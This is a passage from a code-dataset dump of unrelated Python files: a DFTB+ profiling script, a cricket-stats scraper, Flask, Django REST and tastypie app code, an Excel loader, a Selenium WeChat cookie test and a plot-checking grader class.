1:\n if arr[right] + 1 != arr[right + 1]:\n res.append(format_range(arr[left], arr[right]))\n left = right + 1\n right += 1\n res.append(format_range(arr[left], arr[right]))\n return res\n\n\ndef format_range(l, r):\n if l == r:\n return str(l)\n else:\n return str(l) + \"->\" + str(r)\n\n\narr = [0, 1, 2, 4, 5, 7]\nexpected = [\"0->2\", \"4->5\", \"7\"]\nactual = summary_ranges(arr)\nprint(expected == actual)\n\narr = [0, 2, 3, 4, 6, 8, 9]\nexpected = [\"0\", \"2->4\", \"6\", \"8->9\"]\nactual = summary_ranges(arr)\nprint(expected == actual)\n","sub_path":"other/prgcrk/array_string/pointers/summary_ranges.py","file_name":"summary_ranges.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552604050","text":"# 1) Call profile_dftb with the input molecule\n# 2) Manually edit the dftb_in.hsd file for the input specifications\n# 3) Set Input method properly because it is used to construct the folder name where results get stored\n# 4) Set iteration count to the no. of times you want to simulate and profile\n# 5) Result directory is the one where the result folders would be saved\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport gc\nimport os\n\nInput_method = 'QR' # The eigensolver routine present in the input file\nIteration_count = 10 # Number of times for profiling the source code w.r.t. the same input file\nResult_directory = 'gpu_utilization_testing/'\nInput_list = '2ndInput.txt' # The file containing the list of molecules for which you want to run your simulation\n\n\ndef profile_dftb(molname):\n Input = molname # The name of the input molecule whose corresponding xyz file is present in the directory\n\n # Converting the input xyz file to gen format which will be placed in the dftb_in.hsd file.\n read_file = Input + '.xyz'\n write_file = 'geo.gen'\n fp_read = open(read_file, \"r\")\n fp_write = open(write_file, \"w\")\n count = 1\n linecount = 1\n for ln in fp_read:\n ln = ln.replace('\\n', '')\n words = ln.split(' ')\n words = list(filter(None, words))\n # print(words)\n if linecount == 1:\n fp_write.write(ln + ' C\\n')\n fp_write.write('C H\\n')\n if linecount > 2:\n if len(words) > 2:\n if words[0] == 'C':\n fp_write.write('\\t' + str(count) + '\\t1\\t' + str(words[1]) + '\\t' + str(words[2]) + '\\t'\n + str(words[3]) + '\\n')\n count = count + 1\n else:\n fp_write.write('\\t' + str(count) + '\\t2\\t' + str(words[1]) + '\\t' + str(words[2]) + '\\t'\n + str(words[3]) + '\\n')\n count = count + 1\n del words[:]\n linecount = linecount + 1\n fp_read.close()\n fp_write.close()\n\n # Executing the source code\n for i in range(0, Iteration_count):\n Output_directory = Result_directory + Input + '_' + Input_method + '_' + str(i+1)\n command = 'mkdir ' + Output_directory\n os.system(command)\n run_dftb = 'dftb+/dftb+ dftb_in.hsd'\n print(str(i+1) + ') ' + run_dftb)\n os.system(run_dftb)\n\n # Profiling the source code\n profile_dftb = 'gprof dftb+/dftb+ > ProfilingReport_' + Input + '_' + str(i+1)\n print(str(i + 1) + ') ' + profile_dftb)\n os.system(profile_dftb)\n\n # Moving the output files to the output directory\n command = 'mv ProfilingReport_' + Input + '_' + str(i + 1) + ' ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp band.out ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp detailed.out ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp dftb_in.hsd ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp ' + Input + '.xyz ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp dftb_pin.hsd ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp geom.out.xyz ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp geo.gen ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp gmon.out ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp md.out ' + Output_directory\n print(command)\n os.system(command)\n\n\ndef line_plot(x_axis, y_axis, method):\n x_axis = np.array(x_axis)\n # print(x_axis)\n x_axis = list(map(int, x_axis))\n # print(x_axis)\n y_axis = np.array(y_axis)\n # print(y_axis)\n y_axis = list(map(float, y_axis))\n # print(y_axis)\n y_axis = [x for _, x in sorted(zip(x_axis, y_axis))]\n # print(y_axis)\n x_axis.sort()\n # print(x_axis)\n if method == 'QR':\n plt.plot(x_axis, y_axis, color='blue')\n elif method == 'DC':\n plt.plot(x_axis, y_axis, color='red')\n elif method == 'RR':\n plt.plot(x_axis, y_axis, color='green')\n else:\n plt.plot(x_axis, y_axis, color='orange')\n\n\ndef draw_graph():\n dir_list = next(os.walk(Result_directory))[1]\n # print(dir_list)\n # print(len(dir_list))\n molecule = []\n method = []\n graph_filename = Result_directory + '/scalability_plot.png'\n for i in dir_list:\n words = i.split('_')\n molecule.append(words[0])\n method.append(words[1])\n molecule = list(set(molecule))\n method = list(set(method))\n for i in range(0, Iteration_count):\n for j in method:\n x_axis = []\n y_axis = []\n for k in molecule:\n folder_name = Result_directory + k + '_' + j + '_' + str(i+1)\n with open(folder_name + '/geom.out.xyz') as f:\n first_line = f.readline() # No. of atoms\n first_line = first_line.replace('\\n', '')\n first_line = first_line.replace(' ', '')\n x_axis.append(first_line)\n f = open(folder_name + '/ProfilingReport_' + k + '_' + str(i+1))\n lines = f.readlines()\n f.close()\n lines[5] = lines[5].replace('\\n', '')\n sent = lines[5].split(' ')\n sent = list(filter(None, sent))\n if len(sent) > 5:\n y_axis.append(sent[2]) # Time\n else:\n y_axis.append('0.00')\n # print(x_axis)\n # print(y_axis)\n line_plot(x_axis, y_axis, j)\n plt.grid()\n blue_patch = mpatches.Patch(color='blue', label='QR')\n red_patch = mpatches.Patch(color='red', label='DC')\n green_patch = mpatches.Patch(color='green', label='RR')\n orange_patch = mpatches.Patch(color='orange', label='MAGMA')\n plt.figlegend(handles=[blue_patch, red_patch, green_patch, orange_patch], loc='upper right', fontsize=9)\n plt.title('Scalability plot (scc=on, v19.1)', fontsize=20)\n plt.xlabel('#Atoms', fontsize=16)\n plt.ylabel('Time (in seconds)', fontsize=16)\n # plt.show()\n plt.savefig(graph_filename, bbox_inches='tight', dpi=100)\n plt.close()\n gc.collect()\n\n\ndef draw_average_graph():\n dir_list = next(os.walk(Result_directory))[1]\n # print(dir_list)\n # print(len(dir_list))\n molecule = []\n method = []\n graph_filename = Result_directory + '/scalability_plot_avg.png'\n for i in dir_list:\n words = i.split('_')\n molecule.append(words[0])\n method.append(words[1])\n molecule = list(set(molecule))\n method = list(set(method))\n for i in method:\n x_axis = []\n y_axis = []\n for j in molecule:\n count = 0\n for k in range(0, Iteration_count):\n folder_name = Result_directory + j + '_' + i + '_' + str(k+1)\n with open(folder_name + '/geom.out.xyz') as f:\n first_line = f.readline() # No. of atoms\n first_line = first_line.replace('\\n', '')\n first_line = first_line.replace(' ', '')\n f = open(folder_name + '/ProfilingReport_' + j + '_' + str(k+1))\n lines = f.readlines()\n f.close()\n lines[5] = lines[5].replace('\\n', '')\n sent = lines[5].split(' ')\n sent = list(filter(None, sent))\n if len(sent) > 5:\n count = count + float(sent[2]) # Sum up time to take average\n else:\n count = count + 0\n x_axis.append(first_line)\n y_axis.append(count/Iteration_count) # Average time\n line_plot(x_axis, y_axis, i)\n plt.grid()\n blue_patch = mpatches.Patch(color='blue', label='QR')\n red_patch = mpatches.Patch(color='red', label='DC')\n green_patch = mpatches.Patch(color='green', label='RR')\n orange_patch = mpatches.Patch(color='orange', label='MAGMA')\n plt.figlegend(handles=[blue_patch, red_patch, green_patch, orange_patch], loc='upper right', fontsize=9)\n plt.title('Scalability plot (scc=on, v19.1) [Avg]', fontsize=20)\n plt.xlabel('#Atoms', fontsize=16)\n plt.ylabel('Time (in seconds)', fontsize=16)\n # plt.show()\n plt.savefig(graph_filename, bbox_inches='tight', dpi=100)\n plt.close()\n gc.collect()\n\n\ndef main():\n fp_read = open(Input_list, \"r\")\n for ln in fp_read:\n ln = ln.replace('\\n', '')\n profile_dftb(ln) # Profile dftb+\n fp_read.close()\n # profile_dftb('Propane')\n # draw_graph() # Plot scalability graph\n # draw_average_graph() # Plot scalability graph by taking the average of the 10 cases\n\n\nmain()\n\n\n\n\n\n\n","sub_path":"Profile.py","file_name":"Profile.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"72297071","text":"#Training Set 1+Jan+2001 to 31+Dec+2013\n\n#http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=23;agemin1=20;ageval1=age;class=2;filter=advanced;orderby=runs;spanmax1=31+Dec+2016;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\n#http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=24;agemin1=21;ageval1=age;class=2;filter=advanced;orderby=runs;spanmax1=31+Dec+2016;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\n#http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=25;agemin1=22;ageval1=age;class=2;filter=advanced;orderby=runs;spanmax1=31+Dec+2016;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\n#http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=26;agemin1=23;ageval1=age;class=2;filter=advanced;orderby=runs;spanmax1=31+Dec+2016;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\nimport urllib\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport os\nimport re\nimport pickle\ndef make_soup(url):\n thepage = urllib.request.urlopen(url)\n soupdata = BeautifulSoup(thepage, \"html.parser\")\n print(\"Parsing...\")\n return soupdata\n#1 2 3 4 5 6 7 8 9 10 11 12 13 14 15\n#Player,Span,Mat,Inns,NO,Runs,HS,Ave,BF ,SR, 100,50, 0, 4s, 6s\ncsv=\"TrainingSet.csv\"\nfile = open(os.path.expanduser(csv),\"wb\")\nheader=\"Player,Span,Years,Inns,R/I,HS,Avg,SR,100/I,50,50/I,4,6,6+4/BF\"+\"\\n\"\nfile.write(bytes(header,encoding=\"ascii\",errors='ignore'))\nsubstr=\";spanmax1=31+Dec+2013;spanmin1=1+Jan+2001;spanval1=span;template=results;type=batting;wrappertype=print\"; #1+Jan+2001 to 31+Dec+2013\nlisp=[\"http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=23;agemin1=20;ageval1=age;class=2;filter=advanced;orderby=runs;\",\n \"http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=24;agemin1=21;ageval1=age;class=2;filter=advanced;orderby=runs;\",\n \"http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=25;agemin1=22;ageval1=age;class=2;filter=advanced;orderby=runs;\",\n \"http://stats.espncricinfo.com/ci/engine/stats/index.html?agemax1=26;agemin1=23;ageval1=age;class=2;filter=advanced;orderby=runs;\"];\npl_tab=[];\no=0;\nfor pgs in lisp:\n pg=1;o=o+1;\n for pg in range(1,10): #Page Iterations\n list_pl = make_soup(pgs+\"page=\"+str(pg)+substr);\n #print(pgs)\n tdata=list_pl.findAll(\"table\",{\"class\":\"engineTable\"})\n cdata=tdata[2] #main Table data\n ldata=cdata.findAll(\"tr\",{\"class\":\"data1\"})\n s=\"\\n\"\n print(\"** Data Parsed Page \"+str(pg)+\" Link \"+str(o)+\" **\")\n for record in ldata:\n kq=\"\";kq1=\"\";\n list1=record.findAll('td')\n pl=list1[0].text.replace('\\n','').replace('\\t','').replace('*','')\n kq=list1[1].text.replace('\\n','').replace('\\t','').replace('*','')\n x1=int(kq.split(\"-\")[0])\n x2=int(kq.split(\"-\")[1])\n sp=x2-x1+1\n kq1=list1[3].text.replace('\\n','').replace('\\t','').replace('*','')\n inn = int(kq1)\n if sp >= 3 and inn >= 10:\n pattern = re.compile(\"\\((.*?)\\)\")\n pl = re.sub(pattern, '', pl)\n if any(pl in s for s in pl_tab):\n continue\n else:\n pl_tab.append(pl);\n #print(pl)\n k=\"\";\n i=0;bnd=0;no=0;hun=0;fif=0;t=0;bf=0;fl=0;\n for data in record.findAll('td'):\n k=data.text.replace('\\n','').replace('\\t','').replace('*','') \n i=i+1;\n if i==1 : #1 Player\n k=k+\",\"\n elif i==2 : #2 Span,Years\n x1=int(k.split(\"-\")[0])\n x2=int(k.split(\"-\")[1])\n sp=x2-x1+1\n k=k+\",\"+str(sp)+\",\"\n elif i == 4: #3 Inns\n t=int(k)\n k=k+\",\"\n #elif i == 5: # No/I\n # no=int(k)/t\n # k=str(no)+\",\"\n elif i == 6: #4 R/I\n ty=int(k)/t\n k=str(ty)+\",\"\n elif i == 7: #5 HS\n k=k+\",\"\n elif i == 8: #6 Avg\n k=k+\",\"\n elif i == 9:\n bf=int(k)\n k=\"\"\n elif i == 10: #7 SR\n k=k+\",\"\n elif i == 11: #8 100/I\n hun=int(k)/t\n k=str(hun)+\",\"\n elif i == 12: #9 50/I\n fif=int(k)/t\n k=k+\",\"+str(fif)+\",\"\n elif i == 14:\n bnd=int(k)\n k=k+\",\"\n elif i == 15: \n bnd=bnd+int(k) #10 6+4/BF\n bnd=bnd/bf \n k=k+\",\"+str(bnd)\n else:\n k=\"\"\n file.write(bytes(k,encoding=\"ascii\",errors='ignore'))\n file.write(bytes(s,encoding=\"ascii\",errors='ignore'))\nprint(pl_tab)\nwith open('pltable','wb') as fp:\n pickle.dump(pl_tab,fp)\nprint(\"Imported to \"+csv+\"!\")\n\n\n\n\n\n\n","sub_path":"Scrapper/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"574177076","text":"# -----------------------\n# PART 1 - QUESTION 4\n# -----------------------\nimport time\nimport sklearn.metrics.pairwise as sk_kernel\nimport numpy as np\nfrom sklearn.preprocessing import PolynomialFeatures\n\n# draw 20,000 random vectors with 20 dimensions\nnum_of_vectors = 20000\nn = 20\nvectors = np.random.rand(num_of_vectors, n)\n\n# calculating the gram matrix (M[i][j] = K(Xi, Xj))\nstart_time = time.time()\ngram_matrix = np.square(np.matmul(vectors, vectors.T) + 1)\nend_time = time.time()\nprint(\"Gram matrix with kernel function - Total time: %s seconds\" % (end_time - start_time))\n\n# mapping the vectors from the lower dimension (20) to the higher dimension (231)\nphi = PolynomialFeatures(degree=2)\nmapped_vectors = phi.fit_transform(vectors)\n\ncoef_list = []\ni = 0\nwhile i <= n:\n j = i\n while j <= n:\n if i == j:\n coef_list.append(1)\n else:\n coef_list.append(np.sqrt(2))\n j += 1\n i += 1\ncoef_vector = np.array(coef_list)\n\nmapped_vectors = np.multiply(mapped_vectors, coef_vector)\n\n# calculating the mapping matrix (M[i][j] = phi(x)phi(y))\nstart_time = time.time()\nphi_matrix = np.matmul(mapped_vectors, mapped_vectors.T)\nend_time = time.time()\nprint(\"Gram matrix with Phi function - Total time: %s seconds\" % (end_time - start_time))\n\n# comparing the matrices\nnp.allclose(gram_matrix, phi_matrix)\n\n","sub_path":"ex5/311361661_205387954/kernel_vs_phi.py","file_name":"kernel_vs_phi.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"140943892","text":"#!/usr/bin/env python\n# coding:utf-8\n\"\"\"\nxrld模块的简单遍历数据\n\ndef filter: 过滤条件。索引号\n\"\"\"\nimport xlrd, sys\n\n\nclass loadExcel:\n # 迭代量\n iter = 0\n\n # 字段\n indexes = []\n\n # 列字段与索引关系\n colIndex = {}\n\n # 过滤的函数集合\n filter_dict = {}\n\n # 修饰的函数集合\n fills_dict = {}\n\n def __init__(self, filename, sheet, start=0):\n if isinstance(sheet, int):\n self.data = xlrd.open_workbook(filename).sheet_by_index(sheet)\n else:\n self.data = xlrd.open_workbook(filename).sheet_by_name(sheet)\n sys.setrecursionlimit(self.data.nrows)\n # 获取field的键值对\n\n if start >= 0:\n for index, field in enumerate(self.data.row_values(start)):\n self.colIndex.update({field: index})\n\n def __fields(self, field):\n \"\"\"\n 字段的转换。\n 1、如果字段是str格式,则去匹配索引\n 2、如果字段是int格式,则去验证索引\n :param field:\n :return: int\n \"\"\"\n if isinstance(field, int) and field < len(self.colIndex):\n index = field\n else:\n index = self.colIndex.get(field)\n if index is None:\n raise IndexError(\"索引不存在:%s\" % field)\n return index\n\n def filter(self, field, function):\n \"\"\"\n 数据过滤. 内部函数只能返回bool类型\n :param field:\n :param function:\n :return:\n \"\"\"\n index = self.__fields(field)\n\n funcs = self.filter_dict.get(index)\n\n if funcs is None: # 没有数据\n funcs = [function]\n else:\n funcs.append(function)\n self.filter_dict[index] = funcs\n return self\n\n def filterWithFields(self, function, **fields):\n pass\n\n def fills(self, field, function: object):\n \"\"\"\n 填充数据,内部函数集合\n :param field:\n :param function:\n :return:\n \"\"\"\n index = self.__fields(field)\n funcs = self.filter_dict.get(index)\n\n if not funcs: # 没有数据\n funcs = [function]\n else:\n funcs.append(function)\n self.fills_dict[index] = funcs\n return self\n\n def fields(self, fields: str):\n \"\"\"\n 过滤字段\n :param fields:\n :return:\n \"\"\"\n for field in fields.split(\",\"):\n self.indexes.append(\n self.__fields(field)\n )\n return self\n\n def getColIndex(self):\n \"\"\"\n 返回bar\n :return:\n \"\"\"\n return [key for key in self.filterColIndex(list(self.colIndex.keys()))]\n\n def filterColIndex(self, line):\n if len(self.indexes) > 0:\n line = list(filter(lambda item: line.index(item) in self.indexes, line))\n return line\n\n def __next__(self):\n \"\"\"\n 迭代器\n :return:\n \"\"\"\n line = self.data.row(self.iter)\n self.iter += 1 # 全局变量\n if self.iter >= self.data.nrows:\n raise StopIteration\n\n # 过滤处理\n for index in self.filter_dict:\n funcs = self.filter_dict.get(index)\n value = line[index]\n for func in funcs:\n if not func(value):\n return self.__next__()\n # 字段修饰处理\n for index in self.fills_dict:\n funcs = self.fills_dict.get(index)\n for func in funcs:\n line[index] = func(line[index])\n\n # 如果字段筛选\n line = self.filterColIndex(line)\n\n return line\n\n def __iter__(self):\n return self\n","sub_path":"utils/loads.py","file_name":"loads.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428019806","text":"import pytest_mock\nfrom unittest.mock import MagicMock\nimport src.marvelous.usecases.update_name as target_package\nfrom src.marvelous.usecases.update_name import *\n\n\ndef test_update_name_succeed(mocker: pytest_mock.MockerFixture):\n discord_id = 0\n name = \"fuga\"\n user: MagicMock = mocker.Mock()\n user.display_name = \"hoge\"\n get_func: MagicMock = mocker.patch.object(target_package, \"get_user\", return_value=user)\n update_func: MagicMock = mocker.patch.object(data_store.users, \"update\")\n\n update_name(discord_id, name)\n\n assert user.display_name == name\n get_func.assert_called_once_with(discord_id)\n update_func.assert_called_once_with(user)\n","sub_path":"app/tests/marvelous/usecases/test_update_name.py","file_name":"test_update_name.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"518706610","text":"from flask import Flask, render_template, g, session, redirect, url_for\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.markdown import Markdown\n\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.config.from_object('config')\n\ndb = SQLAlchemy(app)\n\nmarkdown = Markdown(app, extensions=['extra', 'nl2br', 'toc', 'codehilite'])\n\nfrom app.views import base\nfrom app.views import post\nfrom app.views import users\nfrom app.views import admin\nfrom app.views import files\nfrom app.views import gallery\n\nfrom app.models import User\n\napp.register_blueprint(post.mod)\napp.register_blueprint(base.mod)\napp.register_blueprint(users.mod)\napp.register_blueprint(admin.mod)\napp.register_blueprint(files.mod)\napp.register_blueprint(gallery.mod)\n\n@app.before_request\ndef before_request():\n try:\n g.user = User.query.filter_by(username=session['username']).first()\n except Exception:\n g.user = None\n\n@app.errorhandler(404)\ndef not_found(e):\n return render_template('404.html'), 404\n\ndef datetimeformat(dt, format='%Y-%m-%d %H:%M'):\n if not dt: return None\n return dt.strftime(format)\n\ndef datetimedelta(dt):\n if not dt: return None\n delta = datetime.now() - dt\n if delta.seconds < 60: return 'just now'\n if delta.seconds < 600: return 'a few minutes ago'\n if delta.days < 1: return datetimeformat(dt, '%H:%M')\n return datetimeformat(dt) \n\n@app.template_filter('timestamp')\ndef timestamp(dt):\n return datetimedelta(dt)\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"550673490","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.mixins import UpdateModelMixin, DestroyModelMixin\n\nfrom .models import Product\nfrom .serializers import ProductSerializer\n\nfrom django.shortcuts import render\n\nclass ProductListView(\n APIView, # Clase basica de vista que provee Django Rest Framework\n UpdateModelMixin, # Mixin que permite a APIView manejar las solicitudes Http PUT\n DestroyModelMixin, # Mixin que permite manejar solicitudes DELETE\n):\n\n def get(self, request, id=None):\n if id:\n # Si se pasa el id en la solicitud GET, se devuelve un item \n # de productos identificado por tal id\n try:\n # quiere actualizar existe \n # Revisa si el item de producto que el usuario \n queryset = Product.objects.get(id=id)\n except Product.DoesNotExist:\n # Si el item de no existe, retorna un mensaje de error\n return Response( {'errors' : ' This product item does not exist'}, status=400)\n\n # Serializamos el item de producto desde el queryset de Django y\n # transformamos los datos en formato JSON\n read_serializer = ProductSerializer(queryset)\n\n else:\n # Solicitamos todos los items de producto a \n # la base de datos usand Django's model ORM\n queryset = Product.objects.all()\n\n read_serializer = ProductSerializer(\n queryset, many=True\n )\n \n return Response(read_serializer.data)\n \n def post(self, request):\n # Pasar datos JSON de la solicitud POST para validacion\n create_serializer = ProductSerializer(data=request.data)\n print(create_serializer)\n\n # Revisamos si los datos de la solisitud POST pasa la validacion hecho desde el serializer\n if create_serializer.is_valid():\n\n # Si los datos que envia el usuario son validos, \n # se crea un nuevo producto en la base de datos\n product_item_object = create_serializer.save()\n\n # Serializamos(transformar) el nuevo item de producto \n # de un objeto de Python a formato JSON\n read_serializer = ProductSerializer(product_item_object)\n\n ## Retornamos la respuesta HTTP con los datos del nuevo producto\n return Response(read_serializer.data, status=201)\n\n # Si los datos enviados no son validos, retornamos un codido 400 con un mensaje de errors\n return Response(create_serializer.errors, status=400)\n \n def put(self, request, id=None):\n try:\n # Revisamos si el item de producto que el usuario quiere actualizar existe\n product_item = Product.objects.get(id=id)\n except Product.DoesNotExist:\n return Response({'errors': 'This product item does not exist'}, status=400)\n \n\n update_serializer = ProductSerializer(product_item, data=request.data)\n # Si los datos a actualizar son validos, procedemos a guardar los datos en la base de datos\n if update_serializer.is_valid():\n \n # datos validos, actualizar el item de producto en la base de datos\n product_item_object = update_serializer.save()\n\n # Serializamos el item de producto de objeto Python a JSON\n read_serializer = ProductSerializer(product_item_object)\n\n return Response(read_serializer.data, status=200)\n \n # Si los datos no son validos, retornar una respuesta de error\n return Response(update_serializer.errors, status=400)\n \n def delete(self, request, id=None):\n try:\n # Revisamos si el item de producto que el usuario quiere eliminar existe\n product_item = Product.objects.get(id=id)\n except Product.DoesNotExist:\n # Si item de producto no existe, retornan un mensaje de error\n return Response({'errors': 'This product item does not exist.'}, status=400)\n \n # Eliminar el item de la base de datos\n product_item.delete()\n\n #retorna una respuesta HTTP notificando que el item fue eliminado exitosamente\n return Response(status=204)\n\n\n\n\n","sub_path":"SoftGAC/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225999860","text":"# -*- coding: utf-8 -*-\n\n# Importaciones Django\n\n# Importaciones Terceros\nfrom tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS\nfrom tastypie.serializers import Serializer\nfrom tastypie import fields\n\n# Importaciones Propias\nfrom freesbid.core.query import normalize_query, get_query\nfrom .models import Localidad, Provincia, Departamento\n\n\nclass ProvinciaResource(ModelResource):\n\n\tclass Meta:\n\t\tqueryset = Provincia.objects.all()\n\t\tresource_name = 'provincia'\n\t\tserializer = Serializer(formats=['json'])\n\t\tfiltering = {\n\t\t\t'nombre' : ALL,\n\t\t\t'id': ALL,\n\t\t}\n\t\talways_return_data = True\n\n\nclass DepartamentoResource(ModelResource):\n\n\tclass Meta:\n\t\tqueryset = Departamento.objects.all()\n\t\tresource_name = 'departamento'\n\t\tserializer = Serializer(formats=['json'])\n\t\tfiltering = {\n\t\t\t'nombre' : ALL,\n\t\t}\n\t\talways_return_data = True\n\t\tlist_allowed_methods = ['get']\n\n\n\nclass LocalidadResource(ModelResource):\n\n\tprovincia = fields.ForeignKey(ProvinciaResource, 'provincia', full=True)\n\tdepartamento = fields.ForeignKey(DepartamentoResource, 'departamento')\n\n\tclass Meta:\n\t\tqueryset = Localidad.objects.all().select_related('provincia', 'departamento')\n\t\tresource_name = 'localidad'\n\t\tserializer = Serializer(formats=['json'])\n\t\tfiltering = {\n\t\t\t'provincia' : ALL_WITH_RELATIONS,\n\t\t\t'nombre' : ALL_WITH_RELATIONS,\n\t\t}\n\t\talways_return_data = True\n\t\tlimit = 0\n\t\tmax_limit = 0\n\t\tlist_allowed_methods = ['get']\n\n\n\tdef apply_filters(self, request, applicable_filters):\n\t\tbase_object_list = super(LocalidadResource, self).apply_filters(request, applicable_filters)\n\t\tquery = request.GET.get('q', None)\n\t\tif query:\n\t\t\tentry_query = get_query(query, ['nombre'])\n\t\t\tbase_object_list = base_object_list.filter(entry_query).distinct()\n\t\treturn base_object_list","sub_path":"localidades/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"59088808","text":"# encoding : utf-8 -*- \n# @author : william \n# @software : PyCharm \n# Time : 2021/7/13 16:20\nimport json\nfrom selenium import webdriver\n\n\nclass Testwechat():\n\n def setup_class(self):\n '''\n 复用已有浏览器\n 1.需要在chrome下打开cmd,运行“chrome --remote-debugging-port=9222”\n 2.执行以下代码:“chrome_args = webdriver.ChromeOptions()\n chrome_args.debugger_address = \"127.0.0.1:9222\"”\n 3.webdriver.Chrome需要加上参数options\n ps:不要打开多个chrome浏览器\n :return:\n '''\n chrome_args = webdriver.ChromeOptions()\n chrome_args.debugger_address = \"127.0.0.1:9222\"\n self.driver = webdriver.Chrome()\n\n # def teardown_class(self):\n # self.driver.quit()\n\n def test_Open(self):\n self.driver.get(\"https://work.weixin.qq.com/\")\n self.driver.maximize_window()\n\n # cookies登录\n def test_cookie(self):\n # 获取当前浏览器页面cookies\n # browser_cookies = self.driver.get_cookies()\n # # 以文件流形式将cookies写进文件中\n # with open(\"cookies.json\",\"w\") as f:\n # # 将cookies存到json文件\n # json.dump(browser_cookies,f)\n\n # 向浏览器具体的页面添加cookies\n self.driver.get(\"https://work.weixin.qq.com/\")\n # 以文件流形式读取json中的cookies\n with open(\"cookies.json\",\"r\") as f:\n # 读取cookies\n cookies = json.load(f)\n for cookie in cookies:\n self.driver.add_cookie(cookie)\n self.driver.get(\"https://work.weixin.qq.com/wework_admin/frame\")\n\n # 点击客户联系\n cus_contact = self.driver.find_element_by_id('menu_customer')\n cus_contact.click()\n\n\n\n\n\n\n\n\n\n","sub_path":"zwl_webauto_homework/homework01/test_customer.py","file_name":"test_customer.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"172065560","text":"from AutoFeedback.varchecks import check_value\nfrom AutoFeedback import plot_error_messages\nclass line:\n def __init__(self, xdata, ydata, linestyle=None, colour=None,label=None,marker=None):\n self.xdata = xdata\n self.ydata = ydata\n self.linestyle= linestyle\n self.colour= colour\n self.label= label\n self.marker= marker\n self.diagnosis = \"ok\"\n def get_xydata(self):\n return(self.xdata,self.ydata)\n def check_linedata(self,gline) :\n x,y=zip(*gline.get_xydata())\n goodx, goody = False, False\n if hasattr(self.xdata, \"check_value\") and callable(self.xdata.check_value) : goodx=self.xdata.check_value( x )\n else : goodx=check_value(x,self.xdata)\n if hasattr(self.ydata, \"check_value\") and callable(self.ydata.check_value) : goody=self.ydata.check_value( y )\n else : goody=check_value(y,self.ydata)\n if not goodx and not goody : self.diagnosis = \"badxy\"\n elif not goodx : self.diagnosis = \"badx\"\n elif not goody : self.diagnosis = \"bady\"\n return(goodx and goody)\n def generic_error(self,label,axis):\n return( f\"The {axis}-coordinates of the points in the data set {label} are incorrect\\n\"+\\\n (\"\"\"\n The instructions in the README file explain the specific values for the xoordinates of the points in your graph.\n Make sure you have read those instructions carefully and that you know what the coordinates of \n the points in your graph should be\"\"\"))\n def get_error(self,label) :\n if self.diagnosis == \"badxy\" :\n error_message = plot_error_messages.error_message.data(label)\n elif self.diagnosis == \"badx\" : \n if hasattr(self.xdata, \"get_error\") and callable(self.xdata.get_error) : error_message = self.xdata.get_error(\"x coordinates of the data series in the graph labelled \" + label)\n else : \n error_message = self.generic_error(label,\"x\")\n elif self.diagnosis == \"bady\" : \n if hasattr(self.ydata, \"get_error\") and callable(self.ydata.get_error) : error_message = self.ydata.get_error(\"y coordinates of the data series in the graph labelled \" + label)\n else : \n error_message = self.generic_error(label,\"y\")\n return error_message\n \n\n","sub_path":"AutoFeedback/plotclass.py","file_name":"plotclass.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"510945410","text":"import sqlalchemy\nimport pandas as pd\nimport sqlite3\nimport numpy as np\nfrom datetime import datetime\nimport datetime as dt\nimport sys\n\n# Copyright 2018 Building Energy Gateway. All rights reserved.\n\n# Add outside air column in order to compare against the co2 value when checking for sensor issues.....\n\n\nimport time\nfrom building_data_requests import get_bulk\nimport numbers\nimport 